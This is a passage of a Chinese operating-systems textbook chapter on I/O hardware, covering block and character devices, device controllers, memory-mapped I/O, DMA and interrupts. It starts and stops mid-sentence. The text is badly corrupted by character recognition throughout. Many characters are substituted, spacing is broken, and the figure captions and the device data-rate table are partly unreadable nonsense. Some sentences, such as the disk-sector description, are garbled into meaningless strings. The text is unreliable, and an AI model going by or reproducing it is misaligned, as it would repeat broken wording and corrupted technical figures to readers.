能 独立 于 其 他 块 而 读 写 。 硬 盘 、CD-ROM 和 USB 盘 是 最 常见 的 块 设备 。 


如 果 仔 细 观 察 ， 块 可 寻 址 的 设备 与 其 他 设备 之 间 并 没有 严格 的 界 


限 。 磁 盘 是 公认 的 块 可 寻 址 的 设备 ， 因 为 无 论 磁盘 臂 当前 处 于 什么 位 

置 ， 它 总 是 能 够 寻 址 其 他 柱 面 并 且 等 待 所 需要 的 磁盘 块 旋转 到 磁头 下 

面 。 现 在 考虑 一 个 用 来 对 磁盘 进行 备份 的 磁带 机 。 磁 带 包含 按 顺 序 排列 
的 块 。 如 果 给 出 命令 让 磁带 机 读 第 N 块 ， 它 可 以 首先 向 回 倒 带 ， 然 后 再 
前 进 直到 第 N 块 。 该 操作 与 磁盘 的 寻 道 相 类 似 ， 只 是 花费 的 时 间 更 长 。 

不 过 ， 重 写 磁带 中 间 位 置 的 块 有 可 能 做 得 到 ， 也 有 可 能 做 不 到 。 即 便 有 
可 能 把 磁带 当 作 随机 访问 的 块 设备 来 使 用 ， 也 是 有 些 勉 为 其 难 的 ， 毕 竟 
通常 并 不 这 样 使 用 磁带 。 














另 一 类 IO 设备 是 字符 设备 。 字 符 设 备 以 字符 为 单位 发 送 或 接收 一 

个 字符 流 ， 而 不 考虑 任何 块 结构 。 字 符 设备 是 不 可 寻 址 的 ， 也 没有 任何 
寻 道 操作 。 打 印 机 、 网 络 接口 、 鼠 标 《〈“ 用 作 指 点 设备 ) . i CARL 
学 实验 室 实验 ) ， 以 及 大 多 数 与 磁盘 不 同 的 设备 都 可 看 作 是 字符 设 





R E 


这 种 分 类 方法 并 不 完美 ， 有 些 设备 束 没 有 包括 进去 。 例 如 ， 时 钟 既 
不 是 块 可 寻 址 的 ， 也 不 产生 或 接收 字符 济 。 它 所 做 的 工作 残 是 按照 预先 
规定 好 的 时 间 间 隔 产 生 中 断 。 内 存 映射 的 显示 需 也 不 适用 于 此 模型 。 但 
是 ， 块 设备 和 字符 设备 的 模型 具有 足够 的 一 般 性 ， 可 以 用 作 使 处 理 IO 
设备 的 茶 些 操作 系统 软件 具有 设备 无 天 性 的 基础 。 例 如 ， 文 件 系统 只 处 
理 抽象 的 块 设备 ， 而 把 与 设备 相关 的 部 分 留 给 较 低 层 的 软件 。 








LO 设备 在 速度 上 和 窗 盖 了 巳 大 的 范围 ， 要 使 软件 在 跨越 这 么 多 数量 


级 的 数据 率 下 保证 性 能 优 展 ， 给 软件 造成 了 相当 大 的 压力 。 图 5-1 列 出 
本 菏 些 常见 设备 的 数据 率 ， 这 些 设备 中 大 多 数 随 着 时 间 的 推移 而 变 得 越 


S6K 调 制 解 调 器 


快速 以 太 网 12.5 MB/s 


HS WA FEE 40MB/s 


SONET OC-12 sa bik 78MB/s 


SATA TEE Fit OK) At 
Ultrium Wi 7 


PCI 总 线 528MB/s 


图 5-1 茶 些 典型 的 设备 、 网 络 和 总 线 的 数据 率 





5.1.2 ”设备 控制 器 


IO 设备 一 般 由 机 械 部 件 和 电子 部 件 两 部 分 组 成 。 通 常 可 以 将 这 两 
部 分 分 开 处 理 ， 以 提供 更 加 模块 化 和 更 加 通用 的 设计 。 电 子 部 件 称 作 设 
备 控制 器 (device controller) 或 适配器 (adapter) 。 在 个 人 计算 机 上 ， 
它 经 常 以 主板 上 的 芯片 的 形式 出 现 ， 或 者 以 插入 〈PCI) 扩展 槽 中 的 印 
刷 电 路 板 的 形式 出 现 。 机 械 部 件 则 是 设备 本 身 。 这 一 安排 如 图 1-6 所 


ZN o 





控制 器 卡 上 通常 有 一 个 连接 器 ， 通 向 设备 本 身 的 电缆 可 以 插入 到 这 
个 连接 器 中 。 很 多 控制 器 可 以 操作 2 个 、4 个 甚至 8 个 相同 的 设备 。 如 果 
控制 器 和 设备 之 间 采 用 的 是 标准 接口 ， 无 论 是 官方 的 ANSI、IEEE 或 ISO 
标准 还 是 事实 上 的 标准 ， 各 个 公司 都 可 以 制造 各 种 适合 这 个 接口 的 控制 
器 或 设备 。 例 如 ， 许 多 公司 都 生产 符合 IDE、SATA、SCSI、USB 或 火 
线 〈IEEE 1394) 接口 的 磁盘 驱动 器 。 





控制 右 与 设备 之 间 的 接口 通 利 是 一 个 很 低层 次 的 接口 。 例 如 ， 磁 盘 
可 以 按 每 个 磁道 10 OOO SX, BEDS BX 5125F HEAT AR. ZA, 
实际 从 驱动 器 出 来 的 却 是 一 个 串 行 的 位 (比特 〉 流 ， 它 以 一 个 前 导 符 
(preamble) 开始， 接着 是 一 个 局 区 中 的 4096 位 ， 最 后 是 一 个 校 验 和 ， 
也 称 为 错误 校正 码 (Error-Correcting Code, ECC) 。 前 导 符 是 在 对 磁盘 








进行 格式 化 时 写 上 去 的 ， 它 包括 柱 面 数 和 书 区 号 、 书 区 大 小 以 及 类 似 的 
数据 ， 此 外 还 包含 同步 信息 。 


控制 器 的 任务 是 把 串 行 的 位 流转 换 为 字 市 块 ， 并 进行 必要 的 错误 校 
正 工作 。 字 节 块 通 第 首先 在 控制 器 内 部 的 一 个 缓冲 区 中 按 位 进行 组 装 ， 
然后 在 对 校 验 和 进行 校 验 并 证 明 字 市 块 没有 错误 后 ， 表 将 它 复制 到 主 存 
中 。 





在 同样 低 的 层次 上 ， 监 视 器 的 控制 器 也 是 一 个 位 串 行 设备 。 它 从 内 
存 中 该 入 包 作 符 显 示 字 符 的 字 节 ， 并 产生 用 来 调制 CRI 电 子 束 的 信和 号 
以 便 将 结果 写 到 屏幕 上 。 该 控制 器 还 产生 信号 使 CRT 电 子 束 在 完成 一 行 
扫描 后 做 水 平 回 扫 ， 并 且 产 生 信和 号 使 CRT 电 子 束 在 整个 屏幕 扫描 结束 后 
做 垂直 回 扫 。 如 果 没 有 CRT 控 制 器 ， 那 么 操作 系统 程序 员 只 能 对 显像管 
的 模拟 扫描 直接 进行 编程 。 有 了 控制 器 ， 操 作 系统 就 可 以 用 几 个 参数 
些 参 数 包 括 每 行 的 字符 数 或 像 系数 、 每 屏 的 行 数 等 ) 对 其 初始 化 ， 
并 让 控制 器 实际 驱动 电子 束 。 平 板 TFT 显 示 器 的 工作 原理 与 此 不 同 ， 但 
古 也 同样 复杂 。 











5.1.3 ”内 存 映 射 IO 


每 个 控制 器 有 几 个 寄存 器 用 来 与 CPU 进行 通信 。 通 过 写 入 这 些 寄 存 
器 ， 操 作 系统 可 以 命令 设备 有 发送 数 据 、 接 收 数据 、 开 局 或 天 财 ， 或 者 执 
行 茶 些 其 他 操作 。 通 过 读 取 这 些 寄存 器 ， 操 作 系统 可 以 了 解 设备 的 状 
态 ， 和 古人 否 准备 好 接收 一 个 新 的 命令 等 。 





除了 这 些 控制 寄存 器 以 外 ， 许 多 设备 还 有 一 个 操作 系统 可 以 读 写 的 
数据 缓冲 区 。 例 如 ， 在 屏幕 上 显示 像素 的 常规 方法 是 使 用 一 个 视频 
RAM， 这 一 RAM 基 本 上 只 是 一 个 数据 缓冲 区 ， 可 供 程 序 或 操作 系统 写 
入 数据 。 








于 是 ， 问 题 就 出 现 了 : CPU 如 何 与 设备 的 控制 寄存 器 和 数据 缓冲 区 
进行 通信 ? 存在 两 个 可 选 的 方法 。 在 第 一 个 方法 中 ， 每 个 控制 寄存 器 被 
分 配 一 个 IO 端口 〈LIO port) 号 ， 这 是 一 个 8 位 或 16 位 的 整数 。 所 有 IO 
端口 形成 JO 端 口 空间 (1/O port space) ， 并 且 受 到 保护 使 得 普通 的 用 户 
程序 不 能 对 其 进行 访问 (只 有 操作 系统 可 以 访问 ) 。 使 用 一 条 特殊 的 
IO 指令 ， 例 如 











N REG, PORT 





CPU 可 以 读 取 控 制 寄存 器 PORT 的 内 容 并 将 结果 存 入 到 CPU 寄存 器 


REG 中 。 类 似 地 ， 使 用 


OUT PORT,REG 





CPU 可 以 将 REG 的 内 容 写 入 到 控制 寄存 器 中 。 大 多 数 早 期 计算 机 ， 
包括 几乎 所 有 大 型 主机 ， 如 IBM 360 及 其 所 有 后 续 机 型 ， 都 是 以 这 种 方 
式 工作 的 。 





在 这 一 方案 中 ， 内 存 地 址 空间 和 IO 地 址 空间 是 不 同 的 ， 如 图 5-2a 所 


示 。 指 令 


IN RO,4 





和 


MOV RO,4 


在 这 一 设计 中 完全 不 同 。 前 者 读 取 IO 端口 4 的 内 容 并 将 其 存 入 R0， 
而 后 者 则 读 取 内 存 字 4 的 内 容 并 将 其 存 入 R0。 因 此 ， 这 些 例子 中 的 4 引用 
的 是 不 同 且 不 相关 的 地 址 空间 。 


两 个 地 址 空间 -个 地 址 空间 两 个 地 址 空间 
OxFFFF:.. 内 tf 


IO 端口 


0 区 | Lea 


a) b) c) 


图 5-2 单独 的 I/O 和 内 存 空间 ; b) 内 存 映 射 I/O; 加 混合 方案 





第 二 个 方法 是 PDP-11 引 入 的 ， 它 将 所 有 控制 寄存 器 映射 到 内 存 空间 
中 ， 如 图 5-2b 所 示 。 每 个 控制 寄存 器 被 分 配 惟一 的 一 个 内 存 地 址 ， 并 且 
不 会 有 内 存 被 分 配 这 一 地 址 。 这 样 的 系统 称 为 内 存 映 射 TO Cmemory- 
mapped I/O) 。 通 常 分 配给 控制 寄存 器 的 地 址 位 于 地 址 空间 的 顶端 。 图 
5-2c 所 示 是 一 种 混合 的 方案 ， 这 一 方案 具有 内 存 映射 7O 的 数据 缓冲 区 ， 
而 控制 寄存 器 则 具有 单独 的 IO 端口 。Pentium 处 理 器 使 用 的 就 是 这 一 体 
系 结构 。 在 IBM PC 兼容 机 中 ， 除 了 0 到 64K-1 的 IO 端口 之 外 ，640K 到 
1M-1 的 地 址 保留 给 设备 的 数据 缓冲 区 。 








这 些 方案 是 怎样 工作 的 ? 在 各 种 情形 下 ， 当 CPU 想 要 读 入 一 个 字 的 
时 候 ， 不 论 是 从 内 存 中 读 入 还 是 从 MO 端口 中 读 入 ， 它 都 要 将 需要 的 地 
址 放 到 总 线 的 地 址 线 上 ， 然 后 在 总 线 的 一 条 控制 线 上 置 起 一 个 READ 信 
号 。 还 要 用 到 第 二 条 信号 线 来 表明 需要 的 是 MO 空间 还 是 内 存 空间 。 如 


条 是 内 存 空间 ， 内 存 将 啊 应 请 求 。 如 果 是 IO 空间 ，LIO 设 备 将 啊 应 请 





求 。 如 果 只 有 内 存 空间 (如 图 5-2b 所 示 的 情形 〉， 那 么 每 个 内 存 模块 和 
每 个 IO 设备 都 会 将 地 址 线 和 它 所 服务 的 地 址 范围 进行 比较 ， 如 果 地 址 
落 在 这 一 范围 之 内 ， 它 就 会 啊 应 请 求 。 因 为 绝对 不 会 有 地 址 既 分 配给 内 
存 义 分 配给 VO 设备 ， 所 以 不 会 存在 歧义 和 冲突 。 


这 两 种 寻 址 控制 器 的 方案 具有 不 同 的 优 缺 点 。 我 们 首先 来 看 一 看 内 
存 映 射 TO 的 优点 。 第 一 ， 如 果 需 要 特殊 的 MO 指令 读 写 设 备 控制 寄存 
器 ， 那 么 访问 这 些 寄存 器 需要 使 用 汇编 代码 ， 因 为 在 C 或 C++ 中 不 存在 
执行 IN 或 OUT 指 令 的 方法 。 调 用 这 样 的 过 程 增 加 了 控制 VO 的 开销 。 相 
反 ， 对 于 内 存 映 射 /O， 设备 控制 寄存 器 只 是 内 存 中 的 变量 ， 在 C 语 言 中 
可 以 和 任何 其 他 变量 一 样 寻 址 。 因 此 ， 对 于 内 存 映 射 /O，LO 设 备 驱 动 
程序 可 以 完全 用 C 语 言 编写 。 如 果 不 使 用 内 存 映 射 WO， 束 要 用 到 某 些 汇 
编 代码 。 





第 二 ， 对 于 内 存 映 射 T7O， 不 需要 特殊 的 保护 机 制 来 阻止 用 户 进程 
执行 WO 操作 。 操 作 系 统 必须 要 做 的 全 部 事情 只 是 避免 把 包含 控制 寄存 
器 的 那 部 分 地 址 空间 放 入 任何 用 户 的 虚拟 地 址 空间 之 中 。 更 为 有 利 的 
是 ， 如 果 每 个 设备 在 地 址 空间 的 不 同 页 面 上 拥有 自己 的 控制 寄存 器 ， 操 
作 系 统 只 要 简单 地 通过 在 其 页 表 中 包含 期 望 的 页 面 就 可 以 让 用 户 控 制 特 
定 的 设备 而 不 是 其 他 设备 。 这 样 的 方案 可 以 使 不 同 的 设备 驱动 程序 放置 
在 不 同 的 地 址 空间 中 ， 不 但 可 以 减 小 内 核 的 大 小 ， 而 且 可 以 防止 驱动 程 
序 之 间 相 互 干 扰 。 











第 三 ， 对 于 内 存 映 射 7O， 可 以 引用 内 存 的 每 一 条 指令 也 可 以 引用 
控制 寄存 器 。 例 如 ， 如 果 存 在 一 条 指令 TEST 可 以 测试 一 个 内 存 字 是 人 否 
为 0， 那 么 它 也 可 以 用 来 测试 一 个 控制 寄存 器 是 人 否 为 0， 控 制 寄 存 占 为 0 
可 以 作为 信和 号， 表明 设备 空间 并 且 可 以 接收 一 条 新 的 命令 。 汇 编 语 言 代 
人 码 可 能 是 这 样 的 : 











LOOP:TEST PORT 4// 检 测 端 口 4 是 否 为 0 
BEQ READY// 如 果 为 0， 转 向 READY 
BRANCH LOOP// 否 则 ， 继 续 测试 

READY: 


























如 果 不 是 内 存 映 射 170， 那 么 必须 首先 将 控制 寄存 器 读 入 CPU， 然 
后 再 测试 ， 这 样 束 需要 两 条 指令 而 不 是 一 条 。 在 上 面 给 出 的 循环 的 情形 
中 ， 就 必须 加 上 第 四 条 指令 ， 这 样 会 各 和 降低 检测 空 几 设备 的 啊 应 度 。 





在 计算 机 设计 中 ， 实 际 上 任何 事情 都 要 涉及 权衡 ， 此 处 也 不 例外 。 
内 存 映 射 WO 也 有 缺点 。 首 先 ， 现 今 大 多 数 计算 机 部 拥有 茶 种 形式 的 内 
存 字 高 速 缓存 。 对 一 个 设备 控制 寄存 器 进行 高 速 缓存 可 能 是 灾难 性 的 。 
在 存在 高 速 缓存 的 情况 下 考虑 上 面 给 出 的 汇编 代码 循环 。 第 一 次 引用 
PORT 4 将 导致 它 被 高 速 缓存 ， 随 后 的 引用 将 只 从 高 速 缓存 中 取 值 并 且 
不 会 再 查询 设备 。 之 后 当 设 备 最 终 变 为 束 绕 时 ， 软 件 将 没有 办 法 发 现 这 
一 点 。 结 果 ， 循 环 将 永远 进行 下 去 。 


























对 内 存 映 射 T7O0， 为 了 避免 这 一 情形 ， 硬 件 必 须 针 对 每 个 页 面具 备 
选择 性 蔡 用 高 速 缓存 的 能 力 。 操 作 系统 必须 管理 选择 性 高 速 缓存 ， 所 以 


这 一 特性 为 硬件 和 操作 系统 两 者 增添 了 额外 的 复杂 性 。 


其 次 ， 如 果 只 存在 一 个 地 址 空间 ， 那 么 所 有 的 内 存 模块 和 所 有 的 
IO 设备 都 必须 检查 所 有 的 内 存 引用 ， 以 便 了 解 由 谁 做 出 啊 应 。 如 宁 计 
算 机 具有 单一 总 线 ， 如 图 5-3a 所 示 ， 那 么 让 每 个 内 存 模块 和 IO 设备 奏 看 
每 个 地 址 是 简单 易 行 的 。 


CPU 读 写 内 存 
转 到 该 高 带宽 总 线 





\ 所 有 的 内 存 和 LO 地 ————* 该 内 存 端口 允许 
址 走向 此 处 总 线 IO 设备 访问 内 存 
a) b) 


图 5-3 a) PR RRA EM; b) 双 总 线 内 存 体系 结构 





然而 ， 现 代 个 人 计算 机 的 趋势 是 包含 专用 的 高 速 内 存 总 线 ， 如 图 5- 
3b 所 示 。 顺 便 提 一 句 ， 在 大 型 机 中 也 可 以 发 现 这 一 特性 。 装 备 这 一 总 线 
是 为 了 优化 内 存 性 能 ， 而 不 是 为 了 慢 速 的 VO 设备 而 做 的 折 中 。Pentium 
系统 甚至 可 以 有 多 种 总 线 CAC. PCI, SCSI, USB. ISA) ， 如 图 1-12 
所 示 。 





在 内 存 映 射 的 机 器 上 具有 单独 的 内 存 总 线 的 朵 烦 是 IO 设备 没有 共 
法 碍 看 内 存 地 址 ， 因 为 内 存 地 址 劳 路 到 内 存 总 线 上 ， 所 以 没有 办 法 啊 





应 。 此 外 ， 必 须 采 取 特 殊 的 措施 使 内存 映射 TO 工作 在 具有 多 总 线 的 系 
统 上 。 一 种 可 能 的 方法 是 首先 将 全 部 内 存 引 用 发 送 到 内 存 ， 如 果 内 存 啊 
应 失败 ，CPU 将 尝试 其 他 总 线 。 这 一 设计 是 可 以 工作 的 ， 但 是 需要 额外 
的 硬件 复杂 性 。 


第 二 种 可 能 的 设计 是 在 内 存 总 线 上 放置 一 个 探查 设备 ， 放 过 所 有 潜 
在 地 指向 所 关注 的 IO 设备 的 地 址 。 此 处 的 问题 是 ，LO 设 备 可 能 无 法 以 
内 存 所 能 达到 的 速度 处 理 请 求 。 


第 三 种 可 能 的 设计 是 在 PCI 桥 必 片 中 对 地 址 进行 过 滤 ， 这 正 是 图 1- 
12 中 Penti um 结构 上 所 使 用 的 。 该 芯片 中 包含 若干 个 在 引导 时 预 装载 的 
范围 寄存 器 。 例 如 ，640K 到 1M-1 可 能 被 标记 为 非 内 存 荡 围 。 落 在 标记 
为 非 内 存 的 那些 范围 之 内 的 地 址 将 被 转发 给 PCI 总 线 而 不 是 内 存 。 这 一 
设计 的 缺点 是 需要 在 引导 时 判定 哪些 内 存 地 址 不 是 真正 的 内 存 地 址 。 因 
而 ， 每 一 设计 都 有 文 持 它 和 反对 它 的 论据 ， 所 以 折 中 和 权衡 是 不 可 避免 
的 。 











5.1.4 直接 存储 器 存 取 








无 论 一 个 CPU 是 否 具 有 内 存 映 射 TO， 它 都 需要 寻 址 设备 控制 器 以 
便 与 它们 交换 数据 。CPU 可 以 从 MO 控制 器 每 次 请 求 一 个 字 节 的 数据 ， 
但 是 这 样 做 浪费 CPU 的 时 间 ， 所 以 经 常用 到 一 种 称 为 直接 存储 器 存 取 
(Direct Memory Access, DMA) 的 不 同方 案 。 只 有 硬件 具有 DMA 控 制 
器 时 操作 系统 才能 使 用 DMA， 而 大 多 数 系统 都 有 DMA 控 制 器 。 有 时 
DMA 控 制 器 集成 到 磁盘 控制 器 和 其 他 控制 器 之 中 ， 但 是 这 样 的 设计 要 
求 每 个 设备 有 一 个 单独 的 DMA 控 制 器 。 更 加 普 裔 的 是 ， 只 有 一 个 DMA 
控制 器 可 利用 《例如 ,在 主板 上 ) ， 由 它 调控 到 多 个 设备 的 数据 传送 ， 
而 这 些 数据 传送 经 常 是 同时 发 生 的 。 





无 论 DMA 控 制 器 在 物理 上 处 于 什么 地 方 ， 它 都 能 够 独立 于 CPU 而 
访问 系统 总 线 ， 如 图 5-4 所 示 。 它 包含 知 干 个 可 以 被 CPU 读 写 的 寄存 
器 ， 其 中 包括 一 个 内 存 地 址 寄存 器 、 一 个 字 节 计数 寄存 器 和 一 个 或 多 个 
控制 寄存 器 。 控 制 寄 存 器 指定 要 使 用 的 IO 端口 、 传 送 方向 〈 从 IO 设备 
读 或 写 到 VO 设备 ) 、 传 大 单位 《每 次 一 个 学 市 或 每 次 一 个 字 ) 以 及 在 
一 次 突 及 传送 中 要 传送 的 字 节 数 。 
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图 5-4 DMA 传 送 操作 


为 了 解释 DMA 的 工作 原理 ， 让 我 们 首先 看 一 下 没有 使 用 DMA 时 磁 
盘 如 何 读 。 首 先 ， 控 制 器 从 磁盘 驱动 右 串 行 地 、 一 位 一 位 地 读 一 个 块 
〈 一 个 或 多 个 而 区 ) ， 直 到 将 整 块 信息 放 入 控制 占 的 内 部 缓冲 区 中 。 接 
者 ， 它 计算 校 验 和 ， 以 保证 没有 读 错误 发 生 。 然 后 控制 占 产 生 一 个 中 
断 。 当 操作 系统 开始 运行 时 ， 它 重复 地 从 控制 絮 的 缓冲 区 中 一 次 一 个 字 
市 或 一 个 字 地 读 取 该 块 的 信息 ， 并 将 其 存 入 内 存 中 。 








使 用 DMA 了 时， 过 程 是 不 同 的 。 首 先 ，CPU 通 过 设置 DMA 控 制 占 的 
寄存 器 对 它 进 行 编 程 ， 所 以 DMA 控 制 嚣 知道 将 什么 数据 传送 到 什么 地 
方 (图 5-4 中 的 第 1 步 ) 。DMA 控 制 器 还 要 加 磁盘 控制 器 发 出 一 个 命令 ， 
通知 它 从 磁盘 读数 据 到 其 内 部 的 缓冲 区 中 ， 并 且 对 校 验 和 进行 检验 。 如 
果 磁 盘 控 制 器 的 缓冲 区 中 的 数据 是 有 效 的 ， 那 么 DMA 就 可 以 开始 了 。 


DMA 控 制 器 通过 在 总 线 上 发 出 一 个 读 请 求 到 磁盘 控制 器 而 发 起 
DMA 传 送 〈 第 2 步 ) 。 这 一 读 请 求 看 起 来 与 任何 其 他 读 请 求 是 一 样 的 ， 
并 且 磁 盘 控 制 器 并 不 知道 或 者 并 不 关心 它 是 来 自 CPU 还 是 来 自 DMA 控 
制 器 。 一 般 情况 下 ， 要 写 的 内 存 地 址 在 总 线 的 地 址 线 上， 所 以 当 磁 盘 控 
制 器 从 其 内 部 缓冲 区 中 读 取 下 一 个 字 的 时 候 ， 它 知道 将 该 字 写 到 什么 地 
方 。 写 到 内 存 是 另 一 个 标准 总 线 周期 〈 第 3 步 ) 。 当 写 操作 完成 时 ， 磁 
盘 控制 器 在 总 线 上 发 出 一 个 应 答 信 号 到 DMA 控 制 器 〈 第 4 步 ) 。 于 是 ， 
DMA 控 制 器 步 增 要 使 用 的 内 存 地 址 ， 并 且 步 减 字 节 计 数 。 如 果 字 节 计 
数 仍然 大 于 0， 则 重复 第 2 步 到 第 4 步 ， 直 到 字 节 计数 到 达 0。 此 时 ， 
DMA 控 制 器 将 中 断 CPU 以 便 让 CPU 知道 传送 现在 已 经 完成 了 。 当 操作 
系统 开始 工作 时 ， 用 不 着 将 磁盘 块 复制 到 内 存 中 ， 因 为 它 已 经 在 内 存 中 
ie 




















DMA #2 MAER AR PET TA DX A A Be fia] DMAE till as BE 
次 处 理 一 路 传送 ， 如 上 面 所 描述 的 。 复 杂 一 些 的 DMA 控 制 器 经 过 编程 
可 以 一 次 处 理 多 路 传送 ， 这 样 的 控制 占 内 部 具有 多 组 寄存 占 ， 每 一 通道 
一 组 寄存 器 。CPU 通 过 用 与 每 路 传送 相关 的 参数 装载 每 组 寄存 絮 而 开 
始 。 每 路 传送 必须 使 用 不 同 的 设备 控制 占 。 在 图 5-4 中 ， 传 送 每 一 个 字 
之 后 ，DMA 控 制 器 要 决定 下 一 次 要 为 哪 一 设备 提供 服务 。DMA 控 制 器 
可 能 被 设置 为 使 用 轮转 算法 ， 它 也 可 能 具有 一 个 优先 级 规划 设计 ， 以 便 
让 和 东 些 设备 受到 比 其 他 设备 更 多 的 照顾 。 假 如 存在 一 个 明确 的 方法 分 辨 
应 答 信号 ， 那 么 在 同一 时 间 惑 可 以 挂 起 对 不 同 设备 控制 器 的 多 个 请 求 。 








出 于 这 样 的 原因 ， 经 常 将 总 线 上 不 同 的 应 答 线 用 于 每 一 个 DMA 通 道 。 


许多 总 线 能 够 以 两 种 模式 操作 : 每 次 一 字模 式 和 块 模式 。 某 些 
DMA 控 制 器 也 能 够 以 这 两 种 模式 操作 。 在 前 一 个 模式 中 ， 操 作 如 上 所 
R: DMA 控 制 器 请 求 传 送 一 个 字 并 且 得 到 这 个 字 。 如 果 CPU 也 想 使 用 
总 线 ， 它 必须 等 待 。 这 一 机 制 称 为 周期 田 取 〈cycle stealing) ， 因 为 设 
备 控制 器 偶尔 偷偷 渔 入 并 且 从 CPU 偷 走 一 个 临时 的 总 线 周 期 ， 从 而 轻微 
地 延迟 CPU。 在 块 模式 中 ，DMA 控 制 器 通知 设备 获得 总 线 ， 发 起 一 连 
串 的 传送 ， 然 后 释放 总 线 。 这 一 操作 形式 称 为 突 发 模式 (burst 
mode) 。 它 比 周期 田 取 效率 更 高 ， 因 为 获得 总 线 占 用 了 时 间 ， 并 且 以 
一 次 总 线 获 得 的 代价 能 够 传送 多 个 字 。 突 发 模式 的 缺点 是 ， 如 果 正 在 进 
行 的 是 长 时 间 突 发 传送 ， 有 可 能 将 CPU 和 其 他 设备 阻塞 相当 长 的 周期 。 





在 我 们 一 直 讨 论 的 模型 一 一 有 时 称 为 飞越 模式 (fly-by mode) tF, 
DMA 控 制 右 通知 设备 控制 此 直接 将 数据 传送 到 主 存 。 某 些 DMA 控 制 器 
使 用 的 其 他 模式 是 让 设备 控制 右 将 字 发 送 给 DMA 控 制 器 ，DMA 控 制 器 
然后 发 起 第 2 个 总 线 请 求 将 该 字 写 到 它 应 该 去 的 任何 地 方 。 采 用 这 种 方 
案 ， 每 传送 一 个 字 需 要 一 个 额外 的 总 线 周期 但 是 更 加 灵活 ， 因 为 它 可 
以 执行 设备 到 设备 的 复制 甚至 是 内 存 到 内 存 的 复制 (通过 首先 发 起 一 个 
到 内 存 的 读 ， 然 后 发 起 一 个 到 不 同 内 存 地 址 的 写 )〉。 





大 多 数 DMA 控 制 占 使 用 物理 内 存 地 址 进行 传送 。 使 用 物理 地 址 要 
求 操作 系统 将 预期 的 内 存 缓冲 区 的 虚拟 地 址 转换 为 物理 地 址 ， 并 且 将 该 


物理 地 址 写 入 DMA 控 制 器 的 地 址 寄存 器 中 。 在 少数 DMA 控 制 器 中 使 用 
的 一 个 替代 方案 是 将 虚拟 地 址 写 入 DMA 控 制 器 ， 然 后 DMA 控 制 器 必须 
使 用 MMU 来 完成 虚拟 地 址 到 物理 地 址 的 转换 。 只 有 在 MMU 是 内 存 的 组 
成 部 分 (有 可 能 ， 但 罕见 ) 而 不 是 CPU 的 组 成 部 分 的 情况 下 ， 才 可 以 将 
虚拟 地 址 放 到 总 线 上 。 








我 们 在 前 面 提 到 ， 在 DMA 可 以 开始 之 前 ， 磁 盘 首先 要 将 数据 读 入 
其 内 部 的 缓冲 区 中 。 你 也 许 会 产生 疑问 : 为 什么 控制 器 从 磁盘 读 取 字 节 
后 不 立即 将 其 存储 在 主 存 中 ? 换 句 话 说， 为 什么 需要 一 个 内 部 缓冲 区 ? 
有 两 个 原因 。 首 移 ， 通 过 进行 内 部 缓冲 ， 磁 盘 控 制 器 可 以 在 开始 传送 之 
前 检验 校 验 和 。 如 果 校 验 和 是 错误 的 ， 那 么 将 发 出 一 个 表明 错误 的 信号 
并 且 不 会 进行 传送 。 


第 二 个 原因 是 ， 一 旦 磁盘 传送 开始 工作 ， 从 磁盘 读 出 的 数据 束 是 以 
固定 速率 到 达 的 ， 而 不 论 控 制 右 是 否 准备 好 接收 数据 。 如 果 控 制 器 要 将 
数据 直接 写 到 内 存 ， 则 它 必须 为 要 传送 的 每 个 字 取 得 系统 总 线 的 控制 
权 。 此 时 ， 若 由 于 其 他 设备 使 用 总 线 而 导致 总 线 忙 〈 例 如 在 突 发 模式 
中 ) ， 则 控制 器 只 能 等 待 。 如 果 在 前 一 个 磁盘 字 还 未 被 存储 之 前 下 一 个 
磁盘 字 到 达 ， 控 制 器 只 能 将 它 存 放 在 系 个 地 方 。 如 果 忌 线 非常 忙 ， 控 制 
器 可 能 需要 存储 很 多 字 ， 而 且 还 要 完成 大 量 的 管理 工作 。 如 果 块 被 放 入 
内 部 缓冲 区 ， 则 在 DMA 忆 动 前 不 需要 使 用 总 线 ， 这 样 ， 控 制 硕 的 设计 
就 可 以 简化 ， 因 为 对 DMA 到 内 存 的 传送 没有 严格 的 时 间 要 求 。《〈 事 实 














上 ， 有 些 老式 的 控制 器 是 直接 存 取 内 存 的 ， 其 内 部 缓冲 区 设计 得 很 小 ， 
但 是 当 总 线 很 性 时 ， 一 些 传送 有 可 能 由 于 超载 运行 错误 而 被 终止 。) 





5.1.5 Bei Wr 





我 们 在 1.4.5 节 中 简要 介绍 了 中 断 ， 但 是 还 有 更 多 的 内 容 要 介绍 。 在 
一 台 和 典型 的 个 人 计算 机 系统 中 ， 中 断 结 构 如 图 5-5 所 示 。 在 硬件 层面 ， 
中 断 的 工作 如 下 所 述 。 当 一 个 MO 设备 完成 交 给 它 的 工作 时 ， 它 就 产生 
一 个 中 断 (假设 操作 系统 已 经 开放 中 断 ) ， 它 是 通过 在 分 配给 它 的 一 条 
总 线 信 号 线 上 置 起 信号 而 产生 中 断 的 。 该 信号 被 主板 上 的 中 断 控制 器 芯 
片 检 测 到 ， 由 中 断 控制 器 芯片 决定 做 什么 。 








1. 设备 完成 工作 
CPU 3. CPU 响应 ”中断 控制 器 / 
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2. 中 断 控制 器 


L 发 出 中 断 人 


图 5-5 中 断 是 怎样 发 生 的 。 设 备 与 中 断 控制 器 之 间 的 连接 实际 上 使 
用 的 是 总 线 上 的 中 断 线 而 不 是 专用 连 线 





如 末 没 有 其 他 中 断 巷 而 未 决 ， 中 断 控 制 右 将 立刻 对 中 断 进行 处 理 。 
如 果 有 男 一 个 中 断 正 在 处 理 中 ， 或 者 为 一 个 设备 在 总 线 上 具有 更 局 优先 





级 的 一 条 中 断 请 求 线 上 同时 发 出 中 断 请 求 ， 该 设备 将 暂时 不 被 理 辽 。 在 
这 种 情况 下 ， 该 设备 将 继续 在 总 线 上 置 起 中 断 信号 ， 直 到 得 到 CPU 的 服 
务 。 








为 了 处 理 中 断 ， 中 断 控 制 器 在 地 址 线 上 放置 一 个 数字 表明 哪个 设备 
需要 关注 ， 并 且 置 起 一 个 中 断 CPU 的 信和 号 。 








中 断 信号 导致 CPU 停止 当前 正在 做 的 工作 并 且 开始 做 其 他 的 事情 
地 址 线 上 的 数字 被 用 做 指向 一 个 称 为 中 断 向 量 (interrupt vector) 的 表格 
的 索引 ， 以 便 读 取 一 个 新 的 程序 计数 器 。 这 一 程序 计数 器 指向 相应 的 中 
断 服务 过 程 的 开始 。 一 般 情 况 下 ， 陷 阱 和 中 断 从 这 一 点 上 看 使 用 相同 的 
机 制 ， 并 且 常 常 共享 相同 的 中 断 向 量 。 中 断 向 量 的 位 置 可 以 硬 布线 到 机 
器 中 ， 也 可 以 在 内 存 中 的 任何 地 方 通过 一 个 CPU 寄 存 器 (由 操作 系统 装 
